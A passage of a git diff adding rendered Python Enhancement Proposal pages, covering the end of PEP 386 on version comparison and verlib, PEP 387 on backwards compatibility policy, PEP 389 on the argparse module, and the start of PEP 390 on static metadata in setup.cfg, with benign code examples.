Table of Contents +
+
+

Abstract

+

Note: This PEP has been superseded by the version identification and +dependency specification scheme defined in PEP 440.

+

This PEP proposed a new version comparison schema system in Distutils.

+
+
+

Motivation

+

In Python there are no real restrictions yet on how a project should manage its +versions, and how they should be incremented.

+

Distutils provides a version distribution meta-data field but it is freeform and +current users, such as PyPI usually consider the latest version pushed as the +latest one, regardless of the expected semantics.

+

Distutils will soon extend its capabilities to allow distributions to express a +dependency on other distributions through the Requires-Dist metadata field +(see PEP 345) and it will optionally allow use of that field to +restrict the dependency to a set of compatible versions. Notice that this field +is replacing Requires that was expressing dependencies on modules and packages.

+

The Requires-Dist field will allow a distribution to define a dependency on +another package and optionally restrict this dependency to a set of +compatible versions, so one may write:

+
Requires-Dist: zope.interface (>3.5.0)
+
+
+

This means that the distribution requires zope.interface with a version +greater than 3.5.0.

+

This also means that Python projects will need to follow the same convention +as the tool that will be used to install them, so they are able to compare +versions.

+

That is why this PEP proposes, for the sake of interoperability, a standard +schema to express version information and its comparison semantics.

+

Furthermore, this will make OS packagers’ work easier when repackaging standards +compliant distributions, because as of now it can be difficult to decide how two +distribution versions compare.

+
+
+

Requisites and current status

+

It is not in the scope of this PEP to provide a universal versioning schema +intended to support all or even most of existing versioning schemas. There +will always be competing grammars, either mandated by distro or project +policies or by historical reasons that we cannot expect to change.

+

The proposed schema should be able to express the usual versioning semantics, +so it’s possible to parse any alternative versioning schema and transform it +into a compliant one. This is how OS packagers usually deal with the existing +version schemas and is a preferable alternative than supporting an arbitrary +set of versioning schemas.

+

Conformance to usual practice and conventions, as well as a simplicity are a +plus, to ease frictionless adoption and painless transition. Practicality beats +purity, sometimes.

+

Projects have very different versioning needs, but the following are widely +considered important semantics:

+
    +
  1. it should be possible to express more than one versioning level +(usually this is expressed as major and minor revision and, sometimes, +also a micro revision).
  2. +
  3. a significant number of projects need special meaning versions for +“pre-releases” (such as “alpha”, “beta”, “rc”), and these have widely +used aliases (“a” stands for “alpha”, “b” for “beta” and “c” for “rc”). +And these pre-release versions make it impossible to use a simple +alphanumerical ordering of the version string components. +(Example: 3.1a1 < 3.1)
  4. +
  5. some projects also need “post-releases” of regular versions, +mainly for installer work which can’t be clearly expressed otherwise.
  6. +
  7. development versions allow packagers of unreleased work to avoid version +clash with later regular releases.
  8. +
+

For people that want to go further and use a tool to manage their version +numbers, the two major ones are:

+
    +
  • The current Distutils system [1]
  • +
  • Setuptools [2]
  • +
+
+

Distutils

+

Distutils currently provides a StrictVersion and a LooseVersion class +that can be used to manage versions.

+

The LooseVersion class is quite lax. From Distutils doc:

+
Version numbering for anarchists and software realists.
+Implements the standard interface for version number classes as
+described above.  A version number consists of a series of numbers,
+separated by either periods or strings of letters.  When comparing
+version numbers, the numeric components will be compared
+numerically, and the alphabetic components lexically.  The following
+are all valid version numbers, in no particular order:
+
+    1.5.1
+    1.5.2b2
+    161
+    3.10a
+    8.02
+    3.4j
+    1996.07.12
+    3.2.pl0
+    3.1.1.6
+    2g6
+    11g
+    0.960923
+    2.2beta29
+    1.13++
+    5.5.kw
+    2.0b1pl0
+
+In fact, there is no such thing as an invalid version number under
+this scheme; the rules for comparison are simple and predictable,
+but may not always give the results you want (for some definition
+of "want").
+
+
+

This class makes any version string valid, and provides an algorithm to sort +them numerically then lexically. It means that anything can be used to version +your project:

+
>>> from distutils.version import LooseVersion as V
+>>> v1 = V('FunkyVersion')
+>>> v2 = V('GroovieVersion')
+>>> v1 > v2
+False
+
+
+

The problem with this is that while it allows expressing any +nesting level it doesn’t allow giving special meaning to versions +(pre and post-releases as well as development versions), as expressed in +requisites 2, 3 and 4.

+

The StrictVersion class is more strict. From the doc:

+
Version numbering for meticulous retentive and software idealists.
+Implements the standard interface for version number classes as
+described above.  A version number consists of two or three
+dot-separated numeric components, with an optional "pre-release" tag
+on the end.  The pre-release tag consists of the letter 'a' or 'b'
+followed by a number.  If the numeric components of two version
+numbers are equal, then one with a pre-release tag will always
+be deemed earlier (lesser) than one without.
+
+The following are valid version numbers (shown in the order that
+would be obtained by sorting according to the supplied cmp function):
+
+    0.4       0.4.0  (these two are equivalent)
+    0.4.1
+    0.5a1
+    0.5b3
+    0.5
+    0.9.6
+    1.0
+    1.0.4a3
+    1.0.4b1
+    1.0.4
+
+The following are examples of invalid version numbers:
+
+    1
+    2.7.2.2
+    1.3.a4
+    1.3pl1
+    1.3c4
+
+
+

This class enforces a few rules, and makes a decent tool to work with version +numbers:

+
>>> from distutils.version import StrictVersion as V
+>>> v2 = V('GroovieVersion')
+Traceback (most recent call last):
+...
+ValueError: invalid version number 'GroovieVersion'
+>>> v2 = V('1.1')
+>>> v3 = V('1.3')
+>>> v2 < v3
+True
+
+
+

It adds pre-release versions, and some structure, but lacks a few semantic +elements to make it usable, such as development releases or post-release tags, +as expressed in requisites 3 and 4.

+

Also, note that Distutils version classes have been present for years +but are not really used in the community.

+
+
+

Setuptools

+

Setuptools provides another version comparison tool [3] +which does not enforce any rules for the version, but tries to provide a better +algorithm to convert the strings to sortable keys, with a parse_version +function.

+

From the doc:

+
Convert a version string to a chronologically-sortable key
+
+This is a rough cross between Distutils' StrictVersion and LooseVersion;
+if you give it versions that would work with StrictVersion, then it behaves
+the same; otherwise it acts like a slightly-smarter LooseVersion. It is
+*possible* to create pathological version coding schemes that will fool
+this parser, but they should be very rare in practice.
+
+The returned value will be a tuple of strings.  Numeric portions of the
+version are padded to 8 digits so they will compare numerically, but
+without relying on how numbers compare relative to strings.  Dots are
+dropped, but dashes are retained.  Trailing zeros between alpha segments
+or dashes are suppressed, so that e.g. "2.4.0" is considered the same as
+"2.4". Alphanumeric parts are lower-cased.
+
+The algorithm assumes that strings like "-" and any alpha string that
+alphabetically follows "final"  represents a "patch level".  So, "2.4-1"
+is assumed to be a branch or patch of "2.4", and therefore "2.4.1" is
+considered newer than "2.4-1", which in turn is newer than "2.4".
+
+Strings like "a", "b", "c", "alpha", "beta", "candidate" and so on (that
+come before "final" alphabetically) are assumed to be pre-release versions,
+so that the version "2.4" is considered newer than "2.4a1".
+
+Finally, to handle miscellaneous cases, the strings "pre", "preview", and
+"rc" are treated as if they were "c", i.e. as though they were release
+candidates, and therefore are not as new as a version string that does not
+contain them, and "dev" is replaced with an '@' so that it sorts lower
+than any other pre-release tag.
+
+
+

In other words, parse_version will return a tuple for each version string, +that is compatible with StrictVersion but also accept arbitrary version and +deal with them so they can be compared:

+
>>> from pkg_resources import parse_version as V
+>>> V('1.2')
+('00000001', '00000002', '*final')
+>>> V('1.2b2')
+('00000001', '00000002', '*b', '00000002', '*final')
+>>> V('FunkyVersion')
+('*funkyversion', '*final')
+
+
+

In this schema practicality takes priority over purity, but as a result it +doesn’t enforce any policy and leads to very complex semantics due to the lack +of a clear standard. It just tries to adapt to widely used conventions.

+
+
+

Caveats of existing systems

+

The major problem with the described version comparison tools is that they are +too permissive and, at the same time, aren’t capable of expressing some of the +required semantics. Many of the versions on PyPI [4] are obviously not +useful versions, which makes it difficult for users to grok the versioning that +a particular package was using and to provide tools on top of PyPI.

+

Distutils classes are not really used in Python projects, but the +Setuptools function is quite widespread because it’s used by tools like +easy_install [6], pip [5] or zc.buildout +[7] to install dependencies of a given project.

+

While Setuptools does provide a mechanism for comparing/sorting versions, +it is much preferable if the versioning spec is such that a human can make a +reasonable attempt at that sorting without having to run it against some code.

+

Also there’s a problem with the use of dates at the “major” version number +(e.g. a version string “20090421”) with RPMs: it means that any attempt to +switch to a more typical “major.minor…” version scheme is problematic because +it will always sort less than “20090421”.

+

Last, the meaning of - is specific to Setuptools, while it is avoided in +some packaging systems like the one used by Debian or Ubuntu.

+
+
+
+

The new versioning algorithm

+

During Pycon, members of the Python, Ubuntu and Fedora community worked on +a version standard that would be acceptable for everyone.

+

It’s currently called verlib and a prototype lives at [9].

+

The pseudo-format supported is:

+
N.N[.N]+[{a|b|c|rc}N[.N]+][.postN][.devN]
+
+
+

The real regular expression is:

+
expr = r"""^
+(?P<version>\d+\.\d+)         # minimum 'N.N'
+(?P<extraversion>(?:\.\d+)*)  # any number of extra '.N' segments
+(?:
+    (?P<prerel>[abc]|rc)         # 'a' = alpha, 'b' = beta
+                                 # 'c' or 'rc' = release candidate
+    (?P<prerelversion>\d+(?:\.\d+)*)
+)?
+(?P<postdev>(\.post(?P<post>\d+))?(\.dev(?P<dev>\d+))?)?
+$"""
+
+
+

Some examples probably make it clearer:

+
>>> from verlib import NormalizedVersion as V
+>>> (V('1.0a1')
+...  < V('1.0a2.dev456')
+...  < V('1.0a2')
+...  < V('1.0a2.1.dev456')
+...  < V('1.0a2.1')
+...  < V('1.0b1.dev456')
+...  < V('1.0b2')
+...  < V('1.0b2.post345')
+...  < V('1.0c1.dev456')
+...  < V('1.0c1')
+...  < V('1.0.dev456')
+...  < V('1.0')
+...  < V('1.0.post456.dev34')
+...  < V('1.0.post456'))
+True
+
+
+

The trailing .dev123 is for pre-releases. The .post123 is for +post-releases – which apparently are used by a number of projects out there +(e.g. Twisted [8]). For example, after a 1.2.0 release there might +be a 1.2.0-r678 release. We used post instead of r because the +r is ambiguous as to whether it indicates a pre- or post-release.

+

.post456.dev34 indicates a dev marker for a post release, that sorts +before a .post456 marker. This can be used to do development versions +of post releases.

+

Pre-releases can use a for “alpha”, b for “beta” and c for +“release candidate”. rc is an alternative notation for “release candidate” +that is added to make the version scheme compatible with Python’s own version +scheme. rc sorts after c:

+
>>> from verlib import NormalizedVersion as V
+>>> (V('1.0a1')
+...  < V('1.0a2')
+...  < V('1.0b3')
+...  < V('1.0c1')
+...  < V('1.0rc2')
+...  < V('1.0'))
+True
+
+
+

Note that c is the preferred marker for third party projects.

+

verlib provides a NormalizedVersion class and a +suggest_normalized_version function.

+
+

NormalizedVersion

+

The NormalizedVersion class is used to hold a version and to compare it +with others. It takes a string as an argument, that contains the representation +of the version:

+
>>> from verlib import NormalizedVersion
+>>> version = NormalizedVersion('1.0')
+
+
+

The version can be represented as a string:

+
>>> str(version)
+'1.0'
+
+
+

Or compared with others:

+
>>> NormalizedVersion('1.0') > NormalizedVersion('0.9')
+True
+>>> NormalizedVersion('1.0') < NormalizedVersion('1.1')
+True
+
+
+

A class method called from_parts is available if you want to create an +instance by providing the parts that composes the version.

+

Examples

+
>>> version = NormalizedVersion.from_parts((1, 0))
+>>> str(version)
+'1.0'
+
+>>> version = NormalizedVersion.from_parts((1, 0), ('c', 4))
+>>> str(version)
+'1.0c4'
+
+>>> version = NormalizedVersion.from_parts((1, 0), ('c', 4), ('dev', 34))
+>>> str(version)
+'1.0c4.dev34'
+
+
+
+
+

suggest_normalized_version

+

suggest_normalized_version is a function that suggests a normalized version +close to the given version string. If you have a version string that isn’t +normalized (i.e. NormalizedVersion doesn’t like it) then you might be able +to get an equivalent (or close) normalized version from this function.

+

This does a number of simple normalizations to the given string, based +on an observation of versions currently in use on PyPI.

+

Given a dump of those versions on January 6th 2010, the function has given those +results out of the 8821 distributions PyPI had:

+
    +
  • 7822 (88.67%) already match NormalizedVersion without any change
  • +
  • 717 (8.13%) match when using this suggestion method
  • +
  • 282 (3.20%) don’t match at all.
  • +
+

The 3.20% of projects that are incompatible with NormalizedVersion +and cannot be transformed into a compatible form, are for most of them date-based +version schemes, versions with custom markers, or dummy versions. Examples:

+
    +
  • working proof of concept
  • +
  • 1 (first draft)
  • +
  • unreleased.unofficialdev
  • +
  • 0.1.alphadev
  • +
  • 2008-03-29_r219
  • +
  • etc.
  • +
+

When a tool needs to work with versions, a strategy is to use +suggest_normalized_version on the versions string. If this function returns +None, it means that the provided version is not close enough to the +standard scheme. If it returns a version that slightly differs from +the original version, it’s a suggested normalized version. Last, if it +returns the same string, it means that the version matches the scheme.

+

Here’s an example of usage:

+
>>> from verlib import suggest_normalized_version, NormalizedVersion
+>>> import warnings
+>>> def validate_version(version):
+...     rversion = suggest_normalized_version(version)
+...     if rversion is None:
+...         raise ValueError('Cannot work with "%s"' % version)
+...     if rversion != version:
+...         warnings.warn('"%s" is not a normalized version.\n'
+...                       'It has been transformed into "%s" '
+...                       'for interoperability.' % (version, rversion))
+...     return NormalizedVersion(rversion)
+...
+
+>>> validate_version('2.4-rc1')
+__main__:8: UserWarning: "2.4-rc1" is not a normalized version.
+It has been transformed into "2.4c1" for interoperability.
+NormalizedVersion('2.4c1')
+
+>>> validate_version('2.4c1')
+NormalizedVersion('2.4c1')
+
+>>> validate_version('foo')
+Traceback (most recent call last):
+File "<stdin>", line 1, in <module>
+File "<stdin>", line 4, in validate_version
+ValueError: Cannot work with "foo"
+
+
+
+
+
+

Roadmap

+

Distutils will deprecate its existing versions class in favor of +NormalizedVersion. The verlib module presented in this PEP will be +renamed to version and placed into the distutils package.

+
+
+

References

+ +
+
+

Acknowledgments

+

Trent Mick, Matthias Klose, Phillip Eby, David Lyon, and many people at Pycon +and Distutils-SIG.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0386.rst

+

Last modified: 2024-12-15 20:57:19 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0387/index.html b/pep-0387/index.html new file mode 100644 index 00000000000..33c7e85d11e --- /dev/null +++ b/pep-0387/index.html @@ -0,0 +1,330 @@ + + + + + + + + PEP 387 – Backwards Compatibility Policy | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 387 – Backwards Compatibility Policy

+
+
Author:
+
Benjamin Peterson <benjamin at python.org>
+
PEP-Delegate:
+
Brett Cannon <brett at python.org>
+
Status:
+
Active
+
Type:
+
Process
+
Created:
+
18-Jun-2009
+
Post-History:
+
19-Jun-2009, +12-Jun-2020, +19-Dec-2022, +16-Jun-2023
+
Replaces:
+
291
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP outlines Python’s backwards compatibility policy.

+
+
+

Rationale

+

As one of the most used programming languages today [1], the +Python core language and its standard library play a critical role in +millions of applications and libraries. This is fantastic. However, it +means the development team must be very careful not to break this +existing 3rd party code with new releases.

+

This PEP takes the perspective that “backwards incompatibility” means +preexisting code ceases to comparatively function after a change. It is +acknowledged that this is not a concrete definition, but the expectation +is people in general understand what is meant by +“backwards incompatibility”, and if they are unsure they may ask the +Python development team and/or steering council for guidance.

+
+
+

Backwards Compatibility Rules

+

This policy applies to all public APIs. These include:

+
    +
  • Syntax and behavior of these constructs as defined by the reference +manual.
  • +
  • The C-API.
  • +
  • Function, class, module, attribute, and method names and types.
  • +
  • Given a set of arguments, the return value, side effects, and raised +exceptions of a function. This does not preclude changes from +reasonable bug fixes.
  • +
  • The position and expected types of arguments and returned values.
  • +
  • Behavior of classes with regards to subclasses: the conditions under +which overridden methods are called.
  • +
  • Documented exceptions and the semantics which lead to their raising.
  • +
  • Exceptions commonly raised in EAFP scenarios.
  • +
+

Others are explicitly not part of the public API. They can change or +be removed at any time in any way. These include:

+
    +
  • Function, class, module, attribute, method, and C-API names and +types that are prefixed by “_” (except special names).
  • +
  • Anything documented publicly as being private. +Note that if something is not documented at all, it is not +automatically considered private.
  • +
  • Imported modules (unless explicitly documented as part of the public +API; e.g. importing the bacon module in the spam does not +automatically mean spam.bacon is part of the public API unless +it is documented as such).
  • +
  • Inheritance patterns of internal classes.
  • +
  • Test suites. (Anything in the Lib/test directory or test +subdirectories of packages.)
  • +
  • Backward compatibility rules do not apply to any module or API that is +explicitly documented as Provisional per PEP 411.
  • +
+
+

Basic policy for backwards compatibility

+
    +
  • In general, incompatibilities should have a large benefit to +breakage ratio, and the incompatibility should be easy to resolve in +affected code. For example, adding an stdlib module with the same +name as a third party package is generally not acceptable. Adding +a method or attribute that conflicts with 3rd party code through +inheritance, however, is likely reasonable.
  • +
  • Unless it is going through the deprecation process below, the +behavior of an API must not change in an incompatible fashion +between any two consecutive releases. Python’s yearly release +process (PEP 602) means that the deprecation period must last at +least two years.
  • +
  • Similarly a feature cannot be removed without notice between any two +consecutive releases.
  • +
  • For changes that are unable to raise a deprecation warning, consult +with the steering council.
  • +
  • The steering council may grant exceptions to this policy. In +particular, they may shorten the required deprecation period for a +feature. Exceptions are only granted for extreme situations such as +dangerously broken or insecure features or features no one could +reasonably be depending on (e.g., support for completely obsolete +platforms).
  • +
+
+
+
+

Soft Deprecation

+

A soft deprecation can be used when using an API which should no longer +be used to write new code, but it remains safe to continue using it in +existing code. The API remains documented and tested, but will not be +developed further (no enhancement).

+

The main difference between a “soft” and a (regular) “hard” deprecation +is that the soft deprecation does not imply scheduling the removal of +the deprecated API.

+

Another difference is that a soft deprecation does not issue a warning: +it’s only mentioned in the documentation, whereas usually a “hard” +deprecation issues a DeprecationWarning warning at runtime. The +documentation of a soft deprecation should explain why the API should be +avoided, and if possible propose a replacement.

+

If the decision is made to deprecate (in the regular sense) a feature +that is currently soft deprecated, the deprecation must follow the +Backwards Compatibility Rules (i.e., there is no exception because +the feature is already soft deprecated).

+
+
+

Making Incompatible Changes

+

Making an incompatible change is a gradual process performed over +several releases:

+
    +
  1. Discuss the change. Depending on the degree of incompatibility, +this could be on the bug tracker, python-dev, python-list, or the +appropriate SIG. A PEP or similar document may be written. +Hopefully users of the affected API will pipe up to comment.
  2. +
  3. Add a warning to the current main branch. +If behavior is changing, the API may gain a new +function or method to perform the new behavior; old usage should +raise the warning. If an API is being removed, simply warn +whenever it is entered. DeprecationWarning is the usual +warning category to use, but PendingDeprecationWarning may be +used in special cases where the old and new versions of the API will +coexist for many releases [2]. The warning message should +include the release the incompatibility is expected to become the +default and a link to an issue that users can post feedback to. +When feasible, also change typeshed +to add the @deprecated decorator (see PEP 702) to the deprecated API, +so that users of static type checkers have another way to learn +about the deprecation.

    For C API, a compiler warning generated by the Py_DEPRECATED macro +is also acceptable.

    +
  4. +
  5. Wait for the warning to appear in at least two minor Python +versions of the same major version, or one minor version in an older +major version (e.g. for a warning in Python 3.10.0, you either wait +until at least Python 3.12 or Python 4.0 to make the change).

    It’s fine to wait more than two releases, for example:

    +
      +
    • If the expected maintenance overhead and security risk of the +deprecated behavior is small (e.g. an old function is reimplemented +in terms of a new, more general one), it can stay indefinitely +(or until the situation changes).
    • +
    • If the deprecated feature is replaced by a new one, it should +generally be removed only after the last Python version +without the new feature reaches end of support.
    • +
    +
  6. +
  7. See if there’s any feedback. Users not involved in the original +discussions may comment now after seeing the warning. Perhaps +reconsider.
  8. +
  9. The behavior change or feature removal may now be made default or +permanent having reached the declared version. Remove the old +version and warning.
  10. +
  11. If a warning cannot be provided to users, consult with the steering +council.
  12. +
+
+
+

Changelog

+
    +
  • 2023-Nov-14: Added @deprecated decorator per PEP 702.
  • +
  • 2023-Jul-03: Added the Soft Deprecation section, as discussed in +https://discuss.python.org/t/27957.
  • +
  • 2023-Jun-26: Multiple smaller updates and clarifications, discussed in +https://discuss.python.org/t/22042.
  • +
  • 2022-Apr-04: Added explicit notes to ask the Steering Council +in several exceptional cases.
  • +
  • 2021-Apr-16: Clarified how long a warning must be emitted before +a change can be made.
  • +
  • 2020-Jul-20: Initial accepted version.
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0387.rst

+

Last modified: 2024-10-10 20:00:57 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0389/index.html b/pep-0389/index.html new file mode 100644 index 00000000000..a223cab3e6a --- /dev/null +++ b/pep-0389/index.html @@ -0,0 +1,451 @@ + + + + + + + + PEP 389 – argparse - New Command Line Parsing Module | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 389 – argparse - New Command Line Parsing Module

+
+
Author:
+
Steven Bethard <steven.bethard at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
25-Sep-2009
+
Python-Version:
+
2.7, 3.2
+
Post-History:
+
27-Sep-2009, 24-Oct-2009
+
+
+
+
Table of Contents +
+
+

Acceptance

+

This PEP was approved by Guido on python-dev on February 21, 2010 [17].

+
+
+

Abstract

+

This PEP proposes inclusion of the argparse [1] module in the Python +standard library in Python 2.7 and 3.2.

+
+
+

Motivation

+

The argparse module is a command line parsing library which provides +more functionality than the existing command line parsing modules in +the standard library, getopt [2] and optparse [3]. It includes +support for positional arguments (not just options), subcommands, +required options, options syntaxes like “/f” and “+rgb”, zero-or-more +and one-or-more style arguments, and many other features the other +two lack.

+

The argparse module is also already a popular third-party replacement +for these modules. It is used in projects like IPython (the Scipy +Python shell) [4], is included in Debian testing and unstable [5], +and since 2007 has had various requests for its inclusion in the +standard library [6] [7] [8]. This popularity suggests it may be +a valuable addition to the Python libraries.

+
+
+

Why aren’t getopt and optparse enough?

+

One argument against adding argparse is that there are “already two +different option parsing modules in the standard library” [9]. The +following is a list of features provided by argparse but not present +in getopt or optparse:

+
    +
  • While it is true there are two option parsing libraries, there +are no full command line parsing libraries – both getopt and +optparse support only options and have no support for positional +arguments. The argparse module handles both, and as a result, is +able to generate better help messages, avoiding redundancies like +the usage= string usually required by optparse.
  • +
  • The argparse module values practicality over purity. Thus, argparse +allows required options and customization of which characters are +used to identify options, while optparse explicitly states “the +phrase ‘required option’ is self-contradictory” and that the option +syntaxes -pf, -file, +f, +rgb, /f and /file +“are not supported by optparse, and they never will be”.
  • +
  • The argparse module allows options to accept a variable number of +arguments using nargs='?', nargs='*' or nargs='+'. The +optparse module provides an untested recipe for some part of this +functionality [10] but admits that “things get hairy when you want +an option to take a variable number of arguments.”
  • +
  • The argparse module supports subcommands, where a main command +line parser dispatches to other command line parsers depending on +the command line arguments. This is a common pattern in command +line interfaces, e.g. svn co and svn up.
  • +
+
+
+

Why isn’t the functionality just being added to optparse?

+

Clearly all the above features offer improvements over what is +available through optparse. A reasonable question then is why these +features are not simply provided as patches to optparse, instead of +introducing an entirely new module. In fact, the original development +of argparse intended to do just that, but because of various fairly +constraining design decisions of optparse, this wasn’t really +possible. Some of the problems included:

+
    +
  • The optparse module exposes the internals of its parsing algorithm. +In particular, parser.largs and parser.rargs are guaranteed +to be available to callbacks [11]. This makes it extremely +difficult to improve the parsing algorithm as was necessary in +argparse for proper handling of positional arguments and variable +length arguments. For example, nargs='+' in argparse is matched +using regular expressions and thus has no notion of things like +parser.largs.
  • +
  • The optparse extension APIs are extremely complex. For example, +just to use a simple custom string-to-object conversion function, +you have to subclass Option, hack class attributes, and then +specify your custom option type to the parser, like this:
    class MyOption(Option):
    +    TYPES = Option.TYPES + ("mytype",)
    +    TYPE_CHECKER = copy(Option.TYPE_CHECKER)
    +    TYPE_CHECKER["mytype"] = check_mytype
    +parser = optparse.OptionParser(option_class=MyOption)
    +parser.add_option("-m", type="mytype")
    +
    +
    +

    For comparison, argparse simply allows conversion functions to be +used as type= arguments directly, e.g.:

    +
    parser = argparse.ArgumentParser()
    +parser.add_option("-m", type=check_mytype)
    +
    +
    +

    But given the baroque customization APIs of optparse, it is unclear +how such a feature should interact with those APIs, and it is +quite possible that introducing the simple argparse API would break +existing custom Option code.

    +
  • +
  • Both optparse and argparse parse command line arguments and assign +them as attributes to an object returned by parse_args. +However, the optparse module guarantees that the take_action +method of custom actions will always be passed a values object +which provides an ensure_value method [12], while the argparse +module allows attributes to be assigned to any object, e.g.:
    foo_object = ...
    +parser.parse_args(namespace=foo_object)
    +foo_object.some_attribute_parsed_from_command_line
    +
    +
    +

    Modifying optparse to allow any object to be passed in would be +difficult because simply passing the foo_object around instead +of a Values instance will break existing custom actions that +depend on the ensure_value method.

    +
  • +
+

Because of issues like these, which made it unreasonably difficult +for argparse to stay compatible with the optparse APIs, argparse was +developed as an independent module. Given these issues, merging all +the argparse features into optparse with no backwards +incompatibilities seems unlikely.

+
+
+

Deprecation of optparse

+

Because all of optparse’s features are available in argparse, the +optparse module will be deprecated. However, because of the +widespread use of optparse, the deprecation strategy contains only +documentation changes and warnings that will not be visible by +default:

+
    +
  • Python 2.7+ and 3.2+ – The following note will be added to the +optparse documentation:
    +
    The optparse module is deprecated and will not be developed +further; development will continue with the argparse module.
    +
  • +
  • Python 2.7+ – If the Python 3 compatibility flag, -3, is +provided at the command line, then importing optparse will issue a +DeprecationWarning. Otherwise no warnings will be issued.
  • +
  • Python 3.2+ – Importing optparse will issue a +PendingDeprecationWarning, which is not displayed by default.
  • +
+

Note that no removal date is proposed for optparse.

+
+
+

Updates to getopt documentation

+

The getopt module will not be deprecated. However, its documentation +will be updated to point to argparse in a couple of places. At the +top of the module, the following note will be added:

+
+
The getopt module is a parser for command line options whose API +is designed to be familiar to users of the C getopt function. +Users who are unfamiliar with the C getopt function or who would +like to write less code and get better help and error messages +should consider using the argparse module instead.
+

Additionally, after the final getopt example, the following note will +be added:

+
+
Note that an equivalent command line interface could be produced +with less code by using the argparse module:
import argparse
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser()
+    parser.add_argument('-o', '--output')
+    parser.add_argument('-v', dest='verbose', action='store_true')
+    args = parser.parse_args()
+    # ... do something with args.output ...
+    # ... do something with args.verbose ..
+
+
+
+
+
+

Deferred: string formatting

+

The argparse module supports Python from 2.3 up through 3.2 and as a +result relies on traditional %(foo)s style string formatting. It +has been suggested that it might be better to use the new style +{foo} string formatting [13]. There was some discussion about +how best to do this for modules in the standard library [14] and +several people are developing functions for automatically converting +%-formatting to {}-formatting [15] [16]. When one of these is added +to the standard library, argparse will use them to support both +formatting styles.

+
+
+

Rejected: getopt compatibility methods

+

Previously, when this PEP was suggesting the deprecation of getopt +as well as optparse, there was some talk of adding a method like:

+
ArgumentParser.add_getopt_arguments(options[, long_options])
+
+
+

However, this method will not be added for a number of reasons:

+
    +
  • The getopt module is not being deprecated, so there is less need.
  • +
  • This method would not actually ease the transition for any getopt +users who were already maintaining usage messages, because the API +above gives no way of adding help messages to the arguments.
  • +
  • Some users of getopt consider it very important that only a single +function call is necessary. The API above does not satisfy this +requirement because both ArgumentParser() and parse_args() +must also be called.
  • +
+
+
+

Out of Scope: Various Feature Requests

+

Several feature requests for argparse were made in the discussion of +this PEP:

+
    +
  • Support argument defaults from environment variables
  • +
  • Support argument defaults from configuration files
  • +
  • Support “foo –help subcommand” in addition to the currently +supported “foo subcommand –help”
  • +
+

These are all reasonable feature requests for the argparse module, +but are out of the scope of this PEP, and have been redirected to +the argparse issue tracker.

+
+
+

Discussion: sys.stderr and sys.exit

+

There were some concerns that argparse by default always writes to +sys.stderr and always calls sys.exit when invalid arguments +are provided. This is the desired behavior for the vast majority of +argparse use cases which revolve around simple command line +interfaces. However, in some cases, it may be desirable to keep +argparse from exiting, or to have it write its messages to something +other than sys.stderr. These use cases can be supported by +subclassing ArgumentParser and overriding the exit or +_print_message methods. The latter is an undocumented +implementation detail, but could be officially exposed if this turns +out to be a common need.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0389.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0390/index.html b/pep-0390/index.html new file mode 100644 index 00000000000..6c7ee846825 --- /dev/null +++ b/pep-0390/index.html @@ -0,0 +1,353 @@ + + + + + + + + PEP 390 – Static metadata for Distutils | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 390 – Static metadata for Distutils

+
+
Author:
+
Tarek Ziadé <tarek at ziade.org>
+
BDFL-Delegate:
+
Alyssa Coghlan
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
10-Oct-2009
+
Python-Version:
+
2.7, 3.2
+
Post-History:
+

+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes a new section and a new format for the setup.cfg file, +that allows describing the Metadata of a package without using setup.py.

+
+
+

Rejection Notice

+

As distutils2 is no longer going to be incorporated into the standard +library, this PEP was rejected by Alyssa Coghlan in late April, 2013.

+

A replacement PEP based on PEP 426 (metadata 2.0) will be created that +defines the minimum amount of information needed to generate an sdist +archive given a source tarball or VCS checkout.

+
+
+

Rationale

+

Today, if you want to list all the Metadata of a distribution (see PEP 314) +that is not installed, you need to use the setup.py command line interface.

+

So, basically, you download it, and run:

+
$ python setup.py --name
+Distribute
+
+$ python setup.py --version
+0.6.4
+
+
+

Where name and version are metadata fields. This is working fine but +as soon as the developers add more code in setup.py, this feature might +break or in worst cases might do unwanted things on the target system.

+

Moreover, when an OS packager wants to get the metadata of a distribution +he is re-packaging, he might encounter some problems to understand +the setup.py file he’s working with.

+

So the rationale of this PEP is to provide a way to declare the metadata +in a static configuration file alongside setup.py that doesn’t require +any third party code to run.

+
+
+

Adding a metadata section in setup.cfg

+

The first thing we want to introduce is a [metadata] section, in the +setup.cfg file, that may contain any field from the Metadata:

+
[metadata]
+name = Distribute
+version = 0.6.4
+
+
+

The setup.cfg file is used to avoid adding yet another configuration +file to work with in Distutils.

+

This file is already read by Distutils when a command is executed, and +if the metadata section is found, it will be used to fill the metadata +fields. If an option that corresponds to a Metadata field is given to +setup(), it will override the value that was possibly present in +setup.cfg.

+

Notice that setup.py is still used and can be required to define some +options that are not part of the Metadata fields. For instance, the +sdist command can use options like packages or scripts.

+
+
+

Multi-lines values

+

Some Metadata fields can have multiple values. To keep setup.cfg compatible +with ConfigParser and the RFC 822 LONG HEADER FIELDS (see section 3.1.1), +these are expressed with ,-separated values:

+
requires = pywin32, bar > 1.0, foo
+
+
+

